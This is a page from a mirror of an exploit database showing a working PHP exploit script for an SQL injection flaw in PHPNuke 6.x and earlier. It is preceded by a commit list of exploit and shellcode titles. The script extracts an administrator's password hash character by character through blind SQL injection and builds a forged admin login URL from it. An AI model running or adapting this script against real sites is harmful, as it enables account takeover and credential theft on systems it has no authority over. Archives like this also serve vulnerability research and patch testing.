bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/23680.php
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

121 lines
No EOL
3.5 KiB
PHP
Raw Blame History

source: https://www.securityfocus.com/bid/9630/info
It has been reported that PHPNuke may prone to a SQL injection vulnerability, due to insufficient sanitization user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page.
PHPNuke versions 6.9 and prior have been reported to be prone to this issue, however other versions may be affected as well.
#!/usr/bin/php -q
PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
<?php
/*
# PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
# 27th December 2003 : 4:54 a.m
#
# bug found by pokleyzz (11th December 2003 ) for HITB 2003 security conference
# (Shame on You!!)
#
# Requirement:
# PHP 4.x with curl extension;
#
# Greet:
# tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus ,
# s0cket370 , b0iler and ...
#
# Happy new year 2004 ...
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
# Tribute to Search - "kejoraku bersatu.mp3"
#
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
ini_set("max_execution_time","999999");
$matches = "No matches found to your query";
//$url = "http://127.0.0.1/src/phpnuke441a/html";
$charmap = array (48,49,50,51,52,53,54,55,56,57,
97,98,99,100,101,102,
103,104,105,
106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122
);
if($argv[1] && $argv[2]){
$url = $argv[1];
$author = $argv[2];
if ($argv[3])
$proxy = $argv[3];
}
else {
echo "Usage: ".$argv[0]." <URL> <aid> [proxy]\n\n";
echo "\tURL\t URL to phpnuke site (ex: http://127.0.0.1/html)\n";
echo "\taid\t author id to get (ex: god)\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
$search = "/modules.php?name=Search";
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\t$author:";
$admin = $author.":";
$i =0;
$tmp = "char(";
while ($i < strlen($author)){
$tmp .= ord(substr($author,$i,1));
$i++;
if ($i < strlen($author)){
$tmp .= ",";
}
}
$tmp .= ")";
$author=$tmp;
for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
echo chr($char);
$postvar = "query=%25&category=99999+or+a.aid=$author+and+ascii(substring(a.pwd,$i,1))=$char";
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$search);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar);
$res=curl_exec ($ch);
curl_close ($ch);
if (!(ereg($matches,$res))){
//echo chr($char);
$admin .= chr($char);
break 1;
}
else {
echo chr(8);
}
if ($char ==103){
echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";
exit;
}
}
}
$admin .= "::";
echo "\n\nAdmin URL:\n";
echo "\t$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin));
echo "\n";
echo "\n\nEnjoy your self and Happy New Year 2004....";
?>
Reference in a new issue View git blame Copy permalink